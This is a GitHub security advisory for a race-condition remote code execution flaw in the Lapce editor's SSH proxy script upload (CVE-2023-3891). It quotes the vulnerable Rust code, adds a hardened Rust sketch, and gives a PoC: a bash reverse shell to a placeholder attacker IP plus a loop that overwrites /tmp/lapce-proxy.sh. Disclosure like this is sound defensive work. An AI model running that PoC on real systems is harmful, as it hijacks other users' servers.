
Lapce v0.2.8 - Remote code execution via Race Condition

High
panekj published GHSA-v7q3-c3cf-w238 Dec 9, 2023

Package

cargo lapce-app/src/proxy/remote.rs (Rust)

Affected versions

<=0.2.8

Patched versions

0.3.0

Description

Lapce v0.2.8 contains a logic flaw that an attacker can use to obtain remote code execution (RCE) on the server Lapce connects to. Lapce uploads a script to a fixed path in a directory where other users can write, so an attacker on that host can replace the file between upload and execution. This is a race condition vulnerability.

Vulnerability

A remote code execution via race condition vulnerability was identified in Lapce v0.2.8. It is the result of several bad practices that allow a user with access to the local network to breach the system and obtain RCE.

This is the vulnerable file:

remote.rs

```rust
// Excerpt from lapce-app/src/proxy/remote.rs (Lapce v0.2.8).
_ => {
    let local_proxy_script =
        Directory::proxy_directory().unwrap().join("proxy.sh"); // The local script path is obtained.

    let mut proxy_script = std::fs::OpenOptions::new()
        .create(true)
        .write(true)
        .open(&local_proxy_script)?;
    proxy_script.write_all(UNIX_PROXY_SCRIPT)?;

    let remote_proxy_script = "/tmp/lapce-proxy.sh";
    // Here the file is uploaded to the SSH server. From this point, the attacker needs to
    // overwrite the proxy.sh script.
    remote.upload_file(local_proxy_script, remote_proxy_script)?;

    // At this point the proxy.sh script needs to be overwritten to achieve Remote Code
    // Execution (RCE).
    let cmd = remote
        .command_builder()
        .args(["chmod", "+x", remote_proxy_script]) // The script is granted execute permissions.
        .output()?;
    debug!("{}", String::from_utf8_lossy(&cmd.stderr));
    debug!("{}", String::from_utf8_lossy(&cmd.stdout));

    let cmd = remote
        .command_builder()
        .args([
            remote_proxy_script,
            if meta::VERSION == "debug" {
                "nightly"
            } else {
                meta::VERSION
            },
            remote_proxy_path,
        ])
        .output()?; // The script is executed.
    debug!("{}", String::from_utf8_lossy(&cmd.stderr));
    debug!("{}", String::from_utf8_lossy(&cmd.stdout));

    cmd.status
}
```
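The fixed `/tmp/lapce-proxy.sh` path in a world-writable directory is what lets another user pre-create or replace the script. As an added example (not code from Lapce or from the advisory), the following std-only Rust sketch shows the hardened pattern for the same write-then-execute step: a fresh mode-0700 directory with an unpredictable name, the script created with `create_new` (O_EXCL semantics), and a pre-execution check. Function names and the sample script bytes are assumptions.

```rust
use std::fs::{self, DirBuilder, OpenOptions};
use std::hash::{BuildHasher, Hasher};
use std::io::{self, Write};
use std::os::unix::fs::{DirBuilderExt, OpenOptionsExt, PermissionsExt};
use std::path::{Path, PathBuf};

/// Random 64-bit value derived from the OS-seeded hash keys (std only, no crates).
fn random_u64() -> u64 {
    std::collections::hash_map::RandomState::new().build_hasher().finish()
}

/// Hardened replacement for the fixed "/tmp/lapce-proxy.sh": a fresh 0700 directory
/// with an unpredictable name, and the script opened with create_new so a file or
/// symlink planted there by someone else is an error instead of being reused.
pub fn write_script_private(base: &Path, script: &[u8]) -> io::Result<PathBuf> {
    let dir = base.join(format!("lapce-proxy-{}-{:016x}", std::process::id(), random_u64()));
    DirBuilder::new().mode(0o700).create(&dir)?; // non-recursive: fails if it already exists
    let path = dir.join("proxy.sh");
    let mut f = OpenOptions::new()
        .create_new(true) // O_EXCL: never open something another user created
        .write(true)
        .mode(0o700)
        .open(&path)?;
    f.write_all(script)?;
    f.sync_all()?;
    Ok(path)
}

/// Defense in depth before `chmod +x` and execution: the target must be a regular file
/// (not a symlink), not writable by group or others, and still hold the bytes we wrote.
/// This narrows the window; the private directory above is what keeps others out of it.
pub fn safe_to_execute(path: &Path, expected: &[u8]) -> io::Result<bool> {
    let meta = fs::symlink_metadata(path)?;
    if !meta.file_type().is_file() || meta.permissions().mode() & 0o022 != 0 {
        return Ok(false);
    }
    Ok(fs::read(path)? == expected)
}

fn main() -> io::Result<()> {
    let script = b"#!/bin/sh\necho proxy\n"; // constructed sample, not Lapce's real script
    let path = write_script_private(&std::env::temp_dir(), script)?;
    println!("{} safe={}", path.display(), safe_to_execute(&path, script)?);
    Ok(())
}
```

In Lapce the write happens on the remote host through `upload_file`, so the equivalent fix has to create the private directory on that host before uploading; the advisory does not describe how 0.3.0 resolved it.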

Exploitation

Exploiting this vulnerability requires access as a user on the remote server (or on the local machine, when a user connects as another user on the same computer). With that access, change to the tmp directory and run the following commands:

```sh
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1" > /tmp/test.sh
while true; do cp /tmp/test.sh /tmp/lapce-proxy.sh || chmod 755 /tmp/lapce-proxy.sh ;done &>/dev/null
```

Evidence of exploitation

This vulnerability exists because the script is uploaded to a directory where any user can write. If the attacker's file is in place when the upload happens, it replaces the original, which lets the attacker alter what the script does and gain RCE on the system.

To exploit the vulnerability, run the PoC above in a shell on that host and wait for a user to connect to the remote server through the SSH support built into Lapce. The attack only succeeds if the attacker's script is created before Lapce generates its own; if Lapce's script already exists, the attacker has to wait until the temporary content is deleted.

The following video shows the exploitation process in more detail.

Proof of Concept video

Update

Here is another video showing what an attacker can achieve with this RCE:
Privilege Escalation

Our security policy

Fluid Attacks has reserved the ID CVE-2023-3891 to refer to this issue from now on.

System Information

  • Version: Lapce v0.2.8 (2023-06-01)
  • Operating System: macOS

Credits

The vulnerability was discovered by Renzo Machado from the Fluid Attacks Offensive Team.

Severity

High, 8.3 / 10

CVSS base metrics

  • Attack vector: Local
  • Attack complexity: Low
  • Privileges required: Low
  • User interaction: Required
  • Scope: Changed
  • Confidentiality: High
  • Integrity: High
  • Availability: High

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVE ID

CVE-2023-3891
